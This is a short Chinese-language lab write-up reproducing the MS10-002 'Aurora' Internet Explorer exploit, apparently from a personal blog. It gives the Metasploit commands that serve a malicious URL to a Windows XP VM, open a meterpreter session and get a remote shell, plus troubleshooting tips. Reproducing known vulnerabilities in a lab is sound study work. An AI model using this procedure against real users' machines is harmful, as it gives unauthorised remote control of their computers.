ms10_002_aurora漏洞复现

一、漏洞详情

针对微软Internet Explorer浏览器“极光”内存损坏的攻击,当用户查看特制网页时允许远程执行代码。

二、复现过程

  • 环境:本机Mac OS、虚拟机win xp

​ mac os需要安装msf(直接用kali也可以)

  • 步骤:
1
2
3
4
5
6
# 开启msf
msfconsole
# 搜索对应模块
search ms10_002_aurora
# 查看要设置的选项,可以指定ip监听
show options

image-20200624175301385

1
2
3
4
5
6
7
8
# 后台执行
exploit -z
# 会生成一个url
http://192.168.0.133:8080/Uk2B76Na8NV
# xp使用IE浏览E打开这个url,就可以获得一个session,指定session
session -i 1
# 就可以获得meterpreter会话,也可以直接执行shell命令
shell

三、问题解决

  • Q:获得不了session无法建立会话

  • A:建议更换xp系统,推荐到itellyou下载

  • Q:meterpreter中文乱码怎么解决,如下图所示

image-20200624184132967

  • A:输入chcp 65001即可切换编码为utf-8,操作如下图

image-20200624184529470

1
2
3
4
5
6
7
8
9
10
11
注:CHCP是一个能够显示或设置活动代码页编号的CMD命令。

代码页 描述

65001 UTF-8代码页

950 繁体中文

936 简体中文默认的GBK

437 MS-DOS美国英语